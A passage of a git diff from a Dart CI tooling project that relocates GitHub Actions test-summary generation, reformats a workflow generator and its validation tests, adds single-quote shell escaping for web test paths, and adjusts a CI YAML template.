for (final f in displayFailures) { + final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; + buf.writeln('
'); + buf.writeln( + ':x: ${escapeHtml(f.name)}$durStr', + ); + buf.writeln(); + + if (f.error.isNotEmpty) { + final error = f.error.length > 2000 + ? '${f.error.substring(0, 2000)}\n... (truncated)' + : f.error; + buf.writeln('**Error:**'); + final fence = _codeFence(error); + buf.writeln(fence); + buf.writeln(error); + buf.writeln(fence); + buf.writeln(); + } + + if (f.stackTrace.isNotEmpty) { + final stack = f.stackTrace.length > 1500 + ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' + : f.stackTrace; + buf.writeln('**Stack Trace:**'); + final fence = _codeFence(stack); + buf.writeln(fence); + buf.writeln(stack); + buf.writeln(fence); + buf.writeln(); + } + + if (f.printOutput.isNotEmpty) { + final trimmed = f.printOutput.trimRight(); + final lineCount = trimmed.split('\n').length; + final printPreview = trimmed.length > 1500 + ? '${trimmed.substring(0, 1500)}\n... (truncated)' + : trimmed; + buf.writeln('**Captured Output ($lineCount lines):**'); + final fence = _codeFence(printPreview); + buf.writeln(fence); + buf.writeln(printPreview); + buf.writeln(fence); + buf.writeln(); + } + + buf.writeln('
'); + buf.writeln(); + } + + if (results.failures.length > 20) { + buf.writeln( + '_...and ${results.failures.length - 20} more failures. See test logs artifact for full details._', + ); + buf.writeln(); + } + } + + buf.writeln('---'); + buf.writeln(artifactLink(':package: View full test logs')); + buf.writeln(); + + write(buf.toString()); + } + + static String _codeFence(String content) { + var fence = '```'; + while (content.contains(fence)) { + fence += '`'; + } + return fence; } } diff --git a/lib/src/cli/utils/test_results_util.dart b/lib/src/cli/utils/test_results_util.dart deleted file mode 100644 index 5259e0b..0000000 --- a/lib/src/cli/utils/test_results_util.dart +++ /dev/null @@ -1,262 +0,0 @@ -import 'dart:convert'; -import 'dart:io'; - -import 'logger.dart'; -import 'step_summary.dart'; - -/// A single test failure with its error, stack trace, and captured print output. -class TestFailure { - final String name; - final String error; - final String stackTrace; - final String printOutput; - final int durationMs; - - TestFailure({ - required this.name, - required this.error, - required this.stackTrace, - required this.printOutput, - required this.durationMs, - }); -} - -/// Parsed results from the NDJSON test results file produced by `--file-reporter json:`. -class TestResults { - int passed = 0; - int failed = 0; - int skipped = 0; - int totalDurationMs = 0; - final List failures = []; - bool parsed = false; -} - -/// Parse the NDJSON file produced by `--file-reporter json:`. -/// -/// Each line is a JSON object with a `type` field. 
We track: -/// - `testStart`: register test name + start time -/// - `testDone`: record result, compute duration -/// - `error`: capture error message + stack trace (accumulated per test) -/// - `print`: capture print output, attribute to testID -/// - `done`: overall total time -TestResults parseTestResultsJson(String jsonPath) { - final results = TestResults(); - final file = File(jsonPath); - if (!file.existsSync()) { - Logger.warn('No JSON results file found at $jsonPath'); - return results; - } - - results.parsed = true; - - // Tracking maps keyed by testID - final testNames = {}; - final testStartTimes = {}; - final testErrors = {}; - final testStackTraces = {}; - final testPrints = {}; - - final lines = file.readAsLinesSync(); - for (final line in lines) { - if (line.trim().isEmpty) continue; - try { - final event = jsonDecode(line) as Map; - final type = event['type'] as String?; - - switch (type) { - case 'testStart': - final test = event['test'] as Map?; - if (test == null) break; - final id = test['id'] as int?; - if (id == null) break; - testNames[id] = test['name'] as String? ?? 'unknown'; - testStartTimes[id] = event['time'] as int? ?? 0; - - case 'testDone': - final id = event['testID'] as int?; - if (id == null) break; - final resultStr = event['result'] as String?; - final hidden = event['hidden'] as bool? ?? false; - final skipped = event['skipped'] as bool? ?? false; - - // Skip synthetic/hidden entries (group-level loading events) - if (hidden) break; - - if (skipped) { - results.skipped++; - } else if (resultStr == 'success') { - results.passed++; - } else if (resultStr == 'failure' || resultStr == 'error') { - results.failed++; - final startTime = testStartTimes[id] ?? 0; - final endTime = event['time'] as int? ?? 0; - results.failures.add( - TestFailure( - name: testNames[id] ?? 'unknown', - error: testErrors[id]?.toString() ?? '', - stackTrace: testStackTraces[id]?.toString() ?? '', - printOutput: testPrints[id]?.toString() ?? 
'', - durationMs: endTime - startTime, - ), - ); - } - - case 'error': - final id = event['testID'] as int?; - if (id == null) break; - // Accumulate multiple errors per test (e.g. test failure + tearDown exception) - testErrors.putIfAbsent(id, () => StringBuffer()); - if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); - testErrors[id]!.write(event['error'] as String? ?? ''); - testStackTraces.putIfAbsent(id, () => StringBuffer()); - if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); - testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); - - case 'print': - final id = event['testID'] as int?; - if (id == null) break; - final message = event['message'] as String? ?? ''; - testPrints.putIfAbsent(id, () => StringBuffer()); - testPrints[id]!.writeln(message); - - case 'done': - final time = event['time'] as int? ?? 0; - results.totalDurationMs = time; - } - } catch (e) { - // Skip malformed JSON lines but continue parsing the rest - Logger.warn('Skipping malformed JSON line: $e'); - } - } - - return results; -} - -/// Choose a code fence delimiter that does not appear in [content]. -String _codeFence(String content) { - var fence = '```'; - while (content.contains(fence)) { - fence += '`'; - } - return fence; -} - -/// Generate a rich GitHub Actions job summary from parsed test results. -/// -/// Writes to $GITHUB_STEP_SUMMARY when running in CI. Platform identifier -/// and failure names are HTML-escaped for safe embedding. -void writeTestJobSummary(TestResults results, int exitCode, String logDir) { - final buf = StringBuffer(); - - // Determine platform identifier for the heading (HTML-escaped for safe embedding) - final platformId = - Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? 
Platform.operatingSystem; - - buf.writeln('## Test Results — ${StepSummary.escapeHtml(platformId)}'); - buf.writeln(); - - if (!results.parsed) { - // Fallback: no JSON file was produced (test binary crashed before writing) - final status = exitCode == 0 ? 'passed' : 'failed'; - final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; - buf.writeln('> [!$icon]'); - buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); - buf.writeln(); - buf.writeln('Check the expanded output in test logs for details.'); - buf.writeln(); - buf.writeln(StepSummary.artifactLink(':package: View full test logs')); - StepSummary.write(buf.toString()); - return; - } - - final total = results.passed + results.failed + results.skipped; - final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); - - // Status banner — alert box lines must all be prefixed with > - if (results.failed == 0) { - buf.writeln('> [!NOTE]'); - buf.writeln('> All $total tests passed in ${durationSec}s'); - } else { - buf.writeln('> [!CAUTION]'); - buf.writeln('> ${results.failed} of $total tests failed'); - } - buf.writeln(); - - // Summary table - buf.writeln('| Status | Count |'); - buf.writeln('|--------|------:|'); - buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); - buf.writeln('| :x: Failed | ${results.failed} |'); - buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); - buf.writeln('| **Total** | **$total** |'); - buf.writeln('| **Duration** | **${durationSec}s** |'); - buf.writeln(); - - // Failed test details - if (results.failures.isNotEmpty) { - buf.writeln('### Failed Tests'); - buf.writeln(); - - // Cap at 20 failures to avoid exceeding the 1 MiB summary limit - final displayFailures = results.failures.take(20).toList(); - for (final f in displayFailures) { - final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; - buf.writeln('
'); - buf.writeln(':x: ${StepSummary.escapeHtml(f.name)}$durStr'); - buf.writeln(); - - if (f.error.isNotEmpty) { - // Truncate very long error messages - final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; - buf.writeln('**Error:**'); - final fence = _codeFence(error); - buf.writeln(fence); - buf.writeln(error); - buf.writeln(fence); - buf.writeln(); - } - - if (f.stackTrace.isNotEmpty) { - // Truncate very long stack traces - final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; - buf.writeln('**Stack Trace:**'); - final fence = _codeFence(stack); - buf.writeln(fence); - buf.writeln(stack); - buf.writeln(fence); - buf.writeln(); - } - - if (f.printOutput.isNotEmpty) { - final trimmed = f.printOutput.trimRight(); - final lineCount = trimmed.split('\n').length; - // Truncate captured output if it's very long - final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; - buf.writeln('**Captured Output ($lineCount lines):**'); - final fence = _codeFence(printPreview); - buf.writeln(fence); - buf.writeln(printPreview); - buf.writeln(fence); - buf.writeln(); - } - - buf.writeln('
'); - buf.writeln(); - } - - if (results.failures.length > 20) { - buf.writeln( - '_...and ${results.failures.length - 20} more failures. ' - 'See test logs artifact for full details._', - ); - buf.writeln(); - } - } - - // Artifact link - buf.writeln('---'); - buf.writeln(StepSummary.artifactLink(':package: View full test logs')); - buf.writeln(); - - StepSummary.write(buf.toString()); -} diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index 5b8396f..26208a3 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -12,7 +12,11 @@ class _PlatformDefinition { final String arch; // x64 | arm64 final String runner; // default `runs-on:` label - const _PlatformDefinition({required this.osFamily, required this.arch, required this.runner}); + const _PlatformDefinition({ + required this.osFamily, + required this.arch, + required this.runner, + }); } /// Maps platform identifiers to their default runner label + metadata. 
@@ -21,8 +25,16 @@ class _PlatformDefinition { /// `ci.runner_overrides: { "": "" }` const _platformDefinitions = { // Linux — org-managed runners - 'ubuntu': _PlatformDefinition(osFamily: 'linux', arch: 'x64', runner: 'runtime-ubuntu-24.04-x64-256gb-64core'), - 'ubuntu-x64': _PlatformDefinition(osFamily: 'linux', arch: 'x64', runner: 'runtime-ubuntu-24.04-x64-256gb-64core'), + 'ubuntu': _PlatformDefinition( + osFamily: 'linux', + arch: 'x64', + runner: 'runtime-ubuntu-24.04-x64-256gb-64core', + ), + 'ubuntu-x64': _PlatformDefinition( + osFamily: 'linux', + arch: 'x64', + runner: 'runtime-ubuntu-24.04-x64-256gb-64core', + ), 'ubuntu-arm64': _PlatformDefinition( osFamily: 'linux', arch: 'arm64', @@ -30,13 +42,33 @@ const _platformDefinitions = { ), // macOS — standard GitHub-hosted runners (no org-managed equivalents) - 'macos': _PlatformDefinition(osFamily: 'macos', arch: 'arm64', runner: 'macos-latest'), - 'macos-arm64': _PlatformDefinition(osFamily: 'macos', arch: 'arm64', runner: 'macos-latest'), - 'macos-x64': _PlatformDefinition(osFamily: 'macos', arch: 'x64', runner: 'macos-15-large'), + 'macos': _PlatformDefinition( + osFamily: 'macos', + arch: 'arm64', + runner: 'macos-latest', + ), + 'macos-arm64': _PlatformDefinition( + osFamily: 'macos', + arch: 'arm64', + runner: 'macos-latest', + ), + 'macos-x64': _PlatformDefinition( + osFamily: 'macos', + arch: 'x64', + runner: 'macos-15-large', + ), // Windows — org-managed runners - 'windows': _PlatformDefinition(osFamily: 'windows', arch: 'x64', runner: 'runtime-windows-2025-x64-256gb-64core'), - 'windows-x64': _PlatformDefinition(osFamily: 'windows', arch: 'x64', runner: 'runtime-windows-2025-x64-256gb-64core'), + 'windows': _PlatformDefinition( + osFamily: 'windows', + arch: 'x64', + runner: 'runtime-windows-2025-x64-256gb-64core', + ), + 'windows-x64': _PlatformDefinition( + osFamily: 'windows', + arch: 'x64', + runner: 'runtime-windows-2025-x64-256gb-64core', + ), 'windows-arm64': _PlatformDefinition( 
osFamily: 'windows', arch: 'arm64', @@ -74,7 +106,9 @@ class WorkflowGenerator { WorkflowGenerator({required this.ciConfig, required this.toolingVersion}); /// Returns the web_test config map if present and valid; otherwise null. - static Map? _getWebTestConfig(Map ciConfig) { + static Map? _getWebTestConfig( + Map ciConfig, + ) { final raw = ciConfig['web_test']; return raw is Map ? raw : null; } @@ -96,7 +130,9 @@ class WorkflowGenerator { final ci = config['ci']; if (ci == null) return null; if (ci is! Map) { - throw StateError('Expected "ci" in $configPath to be an object, got ${ci.runtimeType}'); + throw StateError( + 'Expected "ci" in $configPath to be an object, got ${ci.runtimeType}', + ); } return ci; } @@ -110,10 +146,14 @@ class WorkflowGenerator { String render({String? existingContent}) { final errors = validate(ciConfig); if (errors.isNotEmpty) { - throw StateError('Cannot render with invalid config:\n ${errors.join('\n ')}'); + throw StateError( + 'Cannot render with invalid config:\n ${errors.join('\n ')}', + ); } - final skeletonPath = TemplateResolver.resolveTemplatePath('github/workflows/ci.skeleton.yaml'); + final skeletonPath = TemplateResolver.resolveTemplatePath( + 'github/workflows/ci.skeleton.yaml', + ); final skeletonFile = File(skeletonPath); if (!skeletonFile.existsSync()) { throw StateError('CI skeleton template not found at $skeletonPath'); @@ -136,14 +176,19 @@ class WorkflowGenerator { Map _buildContext() { final features = ciConfig['features'] as Map? ?? {}; final secretsRaw = ciConfig['secrets']; - final secrets = secretsRaw is Map ? secretsRaw : {}; + final secrets = secretsRaw is Map + ? secretsRaw + : {}; final subPackages = ciConfig['sub_packages'] as List? ?? 
[]; // Build secrets list for env block (skip non-string values) final secretsList = >[]; for (final entry in secrets.entries) { if (entry.value is String) { - secretsList.add({'env_name': entry.key, 'secret_name': entry.value as String}); + secretsList.add({ + 'env_name': entry.key, + 'secret_name': entry.value as String, + }); } } @@ -159,7 +204,9 @@ class WorkflowGenerator { final isMultiPlatform = platforms.length > 1; final runnerOverridesRaw = ciConfig['runner_overrides']; - final runnerOverrides = runnerOverridesRaw is Map ? runnerOverridesRaw : {}; + final runnerOverrides = runnerOverridesRaw is Map + ? runnerOverridesRaw + : {}; String resolveRunner(String platformId) { final override = runnerOverrides[platformId]; if (override is String && override.trim().isNotEmpty) { @@ -184,7 +231,8 @@ class WorkflowGenerator { 'tooling_version': toolingVersion, 'dart_sdk': ciConfig['dart_sdk'] ?? '3.9.2', 'line_length': '${ciConfig['line_length'] ?? 120}', - 'pat_secret': ciConfig['personal_access_token_secret'] as String? ?? 'GITHUB_TOKEN', + 'pat_secret': + ciConfig['personal_access_token_secret'] as String? ?? 'GITHUB_TOKEN', // Feature flags 'proto': features['proto'] == true, @@ -197,9 +245,14 @@ class WorkflowGenerator { 'web_test': features['web_test'] == true, // Web test config (only computed when web_test is true) - 'web_test_concurrency': features['web_test'] == true ? _resolveWebTestConcurrency(ciConfig) : '1', - 'web_test_paths': features['web_test'] == true ? _resolveWebTestPaths(ciConfig) : '', - 'web_test_has_paths': features['web_test'] == true && _resolveWebTestHasPaths(ciConfig), + 'web_test_concurrency': features['web_test'] == true + ? _resolveWebTestConcurrency(ciConfig) + : '1', + 'web_test_paths': features['web_test'] == true + ? 
_resolveWebTestPaths(ciConfig) + : '', + 'web_test_has_paths': + features['web_test'] == true && _resolveWebTestHasPaths(ciConfig), // Secrets / env 'has_secrets': secretsList.isNotEmpty, @@ -237,7 +290,11 @@ class WorkflowGenerator { if (webTestConfig != null) { final paths = webTestConfig['paths']; if (paths is List && paths.isNotEmpty) { - return paths.whereType().where((s) => s.trim().isNotEmpty).map((s) => p.posix.normalize(s)).toList(); + return paths + .whereType() + .where((s) => s.trim().isNotEmpty) + .map((s) => p.posix.normalize(s)) + .toList(); } } return const []; @@ -248,7 +305,11 @@ class WorkflowGenerator { if (filtered.isEmpty) return ''; // Shell-quote each path for defense-in-depth (validation already blocks // dangerous characters, but quoting prevents breakage from future changes). - return filtered.map((s) => "'$s'").join(' '); + return filtered.map(_shellQuote).join(' '); + } + + static String _shellQuote(String value) { + return "'${value.replaceAll("'", "'\"'\"'")}'"; } static bool _resolveWebTestHasPaths(Map ciConfig) { @@ -267,7 +328,10 @@ class WorkflowGenerator { existing = existing.replaceAll('\r\n', '\n'); rendered = rendered.replaceAll('\r\n', '\n'); - final sectionPattern = RegExp(r'# --- BEGIN USER: (\S+) ---\n(.*?)# --- END USER: \1 ---', dotAll: true); + final sectionPattern = RegExp( + r'# --- BEGIN USER: (\S+) ---\n(.*?)# --- END USER: \1 ---', + dotAll: true, + ); // Extract user content from existing file final userSections = {}; @@ -285,8 +349,10 @@ class WorkflowGenerator { // Replace empty user sections in rendered output with preserved content var result = rendered; for (final entry in userSections.entries) { - final emptyPattern = '# --- BEGIN USER: ${entry.key} ---\n# --- END USER: ${entry.key} ---'; - final replacement = '# --- BEGIN USER: ${entry.key} ---\n${entry.value}# --- END USER: ${entry.key} ---'; + final emptyPattern = + '# --- BEGIN USER: ${entry.key} ---\n# --- END USER: ${entry.key} ---'; + final 
replacement = + '# --- BEGIN USER: ${entry.key} ---\n${entry.value}# --- END USER: ${entry.key} ---'; result = result.replaceFirst(emptyPattern, replacement); } @@ -311,10 +377,15 @@ class WorkflowGenerator { errors.add('ci.dart_sdk must not contain newlines/tabs'); } else { // dart-lang/setup-dart accepts semver versions or channels like stable/beta/dev. - final isChannel = trimmed == 'stable' || trimmed == 'beta' || trimmed == 'dev'; - final isSemver = RegExp(r'^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$').hasMatch(trimmed); + final isChannel = + trimmed == 'stable' || trimmed == 'beta' || trimmed == 'dev'; + final isSemver = RegExp( + r'^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$', + ).hasMatch(trimmed); if (!isChannel && !isSemver) { - errors.add('ci.dart_sdk must be a Dart SDK channel (stable|beta|dev) or a version like 3.9.2, got "$sdk"'); + errors.add( + 'ci.dart_sdk must be a Dart SDK channel (stable|beta|dev) or a version like 3.9.2, got "$sdk"', + ); } } } @@ -328,14 +399,18 @@ class WorkflowGenerator { final key = entry.key; final value = entry.value; if (key is! String) { - errors.add('ci.features keys must be strings, got ${key.runtimeType}'); + errors.add( + 'ci.features keys must be strings, got ${key.runtimeType}', + ); continue; } if (!_knownFeatureKeys.contains(key)) { errors.add('ci.features contains unknown key "$key" (typo?)'); } if (value is! bool) { - errors.add('ci.features["$key"] must be a bool, got ${value.runtimeType}'); + errors.add( + 'ci.features["$key"] must be a bool, got ${value.runtimeType}', + ); } } } @@ -349,12 +424,16 @@ class WorkflowGenerator { } final lineLength = ciConfig['line_length']; if (lineLength != null && lineLength is! int && lineLength is! String) { - errors.add('ci.line_length must be a number or string, got ${lineLength.runtimeType}'); + errors.add( + 'ci.line_length must be a number or string, got ${lineLength.runtimeType}', + ); } final platforms = ciConfig['platforms']; if (platforms != null) { if (platforms is! 
List) { - errors.add('ci.platforms must be an array, got ${platforms.runtimeType}'); + errors.add( + 'ci.platforms must be an array, got ${platforms.runtimeType}', + ); } else { for (final p in platforms) { if (p is! String || !_platformDefinitions.containsKey(p)) { @@ -372,13 +451,17 @@ class WorkflowGenerator { final subPackages = ciConfig['sub_packages']; if (subPackages != null) { if (subPackages is! List) { - errors.add('ci.sub_packages must be an array, got ${subPackages.runtimeType}'); + errors.add( + 'ci.sub_packages must be an array, got ${subPackages.runtimeType}', + ); } else { final seenNames = {}; final seenPaths = {}; for (final sp in subPackages) { if (sp is! Map) { - errors.add('ci.sub_packages entries must be objects, got ${sp.runtimeType}'); + errors.add( + 'ci.sub_packages entries must be objects, got ${sp.runtimeType}', + ); continue; } final name = sp['name']; @@ -399,20 +482,28 @@ class WorkflowGenerator { continue; } if (pathValue.contains(RegExp(r'[\r\n\t]'))) { - errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must not contain newlines/tabs'); + errors.add( + 'ci.sub_packages["${name is String ? name : '?'}"].path must not contain newlines/tabs', + ); continue; } if (p.isAbsolute(pathValue) || pathValue.startsWith('~')) { - errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must be a relative repo path'); + errors.add( + 'ci.sub_packages["${name is String ? name : '?'}"].path must be a relative repo path', + ); continue; } if (pathValue.contains('\\')) { - errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must use forward slashes (/)'); + errors.add( + 'ci.sub_packages["${name is String ? name : '?'}"].path must use forward slashes (/)', + ); continue; } final normalized = p.posix.normalize(pathValue); if (normalized.startsWith('..') || normalized.contains('/../')) { - errors.add('ci.sub_packages["${name is String ? 
name : '?'}"].path must not traverse outside the repo'); + errors.add( + 'ci.sub_packages["${name is String ? name : '?'}"].path must not traverse outside the repo', + ); continue; } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { @@ -431,7 +522,9 @@ class WorkflowGenerator { final runnerOverrides = ciConfig['runner_overrides']; if (runnerOverrides != null) { if (runnerOverrides is! Map) { - errors.add('ci.runner_overrides must be an object, got ${runnerOverrides.runtimeType}'); + errors.add( + 'ci.runner_overrides must be an object, got ${runnerOverrides.runtimeType}', + ); } else { for (final entry in runnerOverrides.entries) { final key = entry.key; @@ -444,7 +537,9 @@ class WorkflowGenerator { continue; } if (value is! String || value.trim().isEmpty) { - errors.add('ci.runner_overrides["$key"] must be a non-empty string'); + errors.add( + 'ci.runner_overrides["$key"] must be a non-empty string', + ); } } } @@ -453,7 +548,9 @@ class WorkflowGenerator { final webTestConfig = ciConfig['web_test']; if (webTestConfig != null) { if (webTestConfig is! Map) { - errors.add('ci.web_test must be an object, got ${webTestConfig.runtimeType}'); + errors.add( + 'ci.web_test must be an object, got ${webTestConfig.runtimeType}', + ); } else { // Detect unknown keys inside web_test config for (final key in webTestConfig.keys) { @@ -465,16 +562,22 @@ class WorkflowGenerator { final concurrency = webTestConfig['concurrency']; if (concurrency != null) { if (concurrency is! int) { - errors.add('ci.web_test.concurrency must be an integer, got ${concurrency.runtimeType}'); + errors.add( + 'ci.web_test.concurrency must be an integer, got ${concurrency.runtimeType}', + ); } else if (concurrency < 1 || concurrency > 32) { - errors.add('ci.web_test.concurrency must be between 1 and 32, got $concurrency'); + errors.add( + 'ci.web_test.concurrency must be between 1 and 32, got $concurrency', + ); } } final paths = webTestConfig['paths']; if (paths != null) { if (paths is! 
List) { - errors.add('ci.web_test.paths must be an array, got ${paths.runtimeType}'); + errors.add( + 'ci.web_test.paths must be an array, got ${paths.runtimeType}', + ); } else { final seenPaths = {}; for (var i = 0; i < paths.length; i++) { @@ -484,32 +587,46 @@ class WorkflowGenerator { continue; } if (pathValue != pathValue.trim()) { - errors.add('ci.web_test.paths[$i] must not have leading/trailing whitespace'); + errors.add( + 'ci.web_test.paths[$i] must not have leading/trailing whitespace', + ); continue; } if (pathValue.contains(RegExp(r'[\r\n\t]'))) { - errors.add('ci.web_test.paths[$i] must not contain newlines/tabs'); + errors.add( + 'ci.web_test.paths[$i] must not contain newlines/tabs', + ); continue; } if (p.isAbsolute(pathValue) || pathValue.startsWith('~')) { - errors.add('ci.web_test.paths[$i] must be a relative repo path'); + errors.add( + 'ci.web_test.paths[$i] must be a relative repo path', + ); continue; } if (pathValue.contains('\\')) { - errors.add('ci.web_test.paths[$i] must use forward slashes (/)'); + errors.add( + 'ci.web_test.paths[$i] must use forward slashes (/)', + ); continue; } final normalized = p.posix.normalize(pathValue); if (normalized.startsWith('..') || normalized.contains('/../')) { - errors.add('ci.web_test.paths[$i] must not traverse outside the repo'); + errors.add( + 'ci.web_test.paths[$i] must not traverse outside the repo', + ); continue; } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { - errors.add('ci.web_test.paths[$i] contains unsupported characters: "$pathValue"'); + errors.add( + 'ci.web_test.paths[$i] contains unsupported characters: "$pathValue"', + ); continue; } if (!seenPaths.add(normalized)) { - errors.add('ci.web_test.paths contains duplicate path "$normalized"'); + errors.add( + 'ci.web_test.paths contains duplicate path "$normalized"', + ); } } } @@ -523,7 +640,9 @@ class WorkflowGenerator { if (features is Map) { final webTestEnabled = features['web_test'] == true; if (!webTestEnabled && 
webTestConfig is Map && webTestConfig.isNotEmpty) { - errors.add('ci.web_test config is present but ci.features.web_test is not enabled (dead config?)'); + errors.add( + 'ci.web_test config is present but ci.features.web_test is not enabled (dead config?)', + ); } } @@ -542,7 +661,10 @@ class WorkflowGenerator { Logger.info(' PAT secret: ${ciConfig['personal_access_token_secret']}'); Logger.info(' Platforms: ${platforms.join(', ')}'); - final enabledFeatures = features.entries.where((e) => e.value == true).map((e) => e.key).toList(); + final enabledFeatures = features.entries + .where((e) => e.value == true) + .map((e) => e.key) + .toList(); if (enabledFeatures.isNotEmpty) { Logger.info(' Features: ${enabledFeatures.join(', ')}'); } else { @@ -551,10 +673,16 @@ class WorkflowGenerator { if (features['web_test'] == true) { final wtConfig = ciConfig['web_test']; - final wtMap = wtConfig is Map ? wtConfig : {}; - final concurrency = wtMap['concurrency'] is int ? wtMap['concurrency'] : 1; + final wtMap = wtConfig is Map + ? wtConfig + : {}; + final concurrency = wtMap['concurrency'] is int + ? wtMap['concurrency'] + : 1; final webPaths = wtMap['paths'] is List ? wtMap['paths'] as List : []; - Logger.info(' Web test: concurrency=$concurrency, paths=${webPaths.isEmpty ? "(all)" : webPaths.join(", ")}'); + Logger.info( + ' Web test: concurrency=$concurrency, paths=${webPaths.isEmpty ? 
"(all)" : webPaths.join(", ")}', + ); } if (secrets.isNotEmpty) { diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index b210259..52640f1 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -451,7 +451,7 @@ jobs: <%/multi_platform%> <%#web_test%> web-test: - needs: [pre-check<%#format_check%>, auto-format<%/format_check%>] + needs: [pre-check<%#format_check%>, auto-format<%/format_check%><%#single_platform%>, analyze-and-test<%/single_platform%><%#multi_platform%>, analyze<%/multi_platform%>] if: needs.pre-check.outputs.should_run == 'true' runs-on: ubuntu-latest <%#has_secrets%> @@ -515,6 +515,12 @@ jobs: run: dart run build_runner build --delete-conflicting-outputs <%/build_runner%> + # ── shared:proto-verify ── keep in sync with single_platform / multi_platform analyze ── +<%#proto%> + - name: Verify proto files + run: dart run runtime_ci_tooling:manage_cicd verify-protos + +<%/proto%> - name: Setup Chrome id: setup-chrome uses: browser-actions/setup-chrome@v2 diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index ee04688..7dbb9f9 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -38,7 +38,9 @@ void main() { // ---- dart_sdk ---- group('dart_sdk', () { test('missing dart_sdk produces error', () { - final errors = WorkflowGenerator.validate({'features': {}}); + final errors = WorkflowGenerator.validate({ + 'features': {}, + }); expect(errors, contains('ci.dart_sdk is required')); }); @@ -92,32 +94,43 @@ void main() { expect(errors, anyElement(contains('whitespace'))); }); - test('dart_sdk with embedded tab (after trim is identity) triggers newlines/tabs error', () { - // A tab in the middle: trim() has no effect but the regex catches it. 
- final errors = WorkflowGenerator.validate({ - 'dart_sdk': '3.9\t.2', - 'features': {}, - }); - expect(errors, anyElement(contains('newlines/tabs'))); - }); + test( + 'dart_sdk with embedded tab (after trim is identity) triggers newlines/tabs error', + () { + // A tab in the middle: trim() has no effect but the regex catches it. + final errors = WorkflowGenerator.validate({ + 'dart_sdk': '3.9\t.2', + 'features': {}, + }); + expect(errors, anyElement(contains('newlines/tabs'))); + }, + ); test('valid semver dart_sdk passes', () { - final errors = WorkflowGenerator.validate(_validConfig(dartSdk: '3.9.2')); + final errors = WorkflowGenerator.validate( + _validConfig(dartSdk: '3.9.2'), + ); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); test('valid semver with pre-release passes', () { - final errors = WorkflowGenerator.validate(_validConfig(dartSdk: '3.10.0-beta.1')); + final errors = WorkflowGenerator.validate( + _validConfig(dartSdk: '3.10.0-beta.1'), + ); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); test('channel "stable" passes', () { - final errors = WorkflowGenerator.validate(_validConfig(dartSdk: 'stable')); + final errors = WorkflowGenerator.validate( + _validConfig(dartSdk: 'stable'), + ); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); test('channel "beta" passes', () { - final errors = WorkflowGenerator.validate(_validConfig(dartSdk: 'beta')); + final errors = WorkflowGenerator.validate( + _validConfig(dartSdk: 'beta'), + ); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); @@ -127,7 +140,9 @@ void main() { }); test('invalid dart_sdk like "latest" produces error', () { - final errors = WorkflowGenerator.validate(_validConfig(dartSdk: 'latest')); + final errors = WorkflowGenerator.validate( + _validConfig(dartSdk: 'latest'), + ); expect(errors, anyElement(contains('channel'))); }); @@ -169,18 +184,20 @@ void main() { }); test('all known feature keys pass validation', () { - final 
errors = WorkflowGenerator.validate(_validConfig( - features: { - 'proto': true, - 'lfs': false, - 'format_check': true, - 'analysis_cache': false, - 'managed_analyze': true, - 'managed_test': false, - 'build_runner': true, - 'web_test': true, - }, - )); + final errors = WorkflowGenerator.validate( + _validConfig( + features: { + 'proto': true, + 'lfs': false, + 'format_check': true, + 'analysis_cache': false, + 'managed_analyze': true, + 'managed_test': false, + 'build_runner': true, + 'web_test': true, + }, + ), + ); expect(errors.where((e) => e.contains('features')), isEmpty); }); @@ -193,12 +210,16 @@ void main() { // ---- platforms ---- group('platforms', () { test('non-list platforms produces error', () { - final errors = WorkflowGenerator.validate(_validConfig(platforms: null)..['platforms'] = 'ubuntu'); + final errors = WorkflowGenerator.validate( + _validConfig(platforms: null)..['platforms'] = 'ubuntu', + ); expect(errors, anyElement(contains('platforms must be an array'))); }); test('unknown platform entry produces error', () { - final errors = WorkflowGenerator.validate(_validConfig(platforms: ['ubuntu', 'solaris'])); + final errors = WorkflowGenerator.validate( + _validConfig(platforms: ['ubuntu', 'solaris']), + ); expect(errors, anyElement(contains('invalid platform "solaris"'))); }); @@ -210,7 +231,9 @@ void main() { }); test('valid single platform passes', () { - final errors = WorkflowGenerator.validate(_validConfig(platforms: ['ubuntu'])); + final errors = WorkflowGenerator.validate( + _validConfig(platforms: ['ubuntu']), + ); expect(errors.where((e) => e.contains('platforms')), isEmpty); }); @@ -265,19 +288,27 @@ void main() { test('valid pat passes', () { final errors = WorkflowGenerator.validate(_validConfig(pat: 'MY_PAT')); - expect(errors.where((e) => e.contains('personal_access_token_secret')), isEmpty); + expect( + errors.where((e) 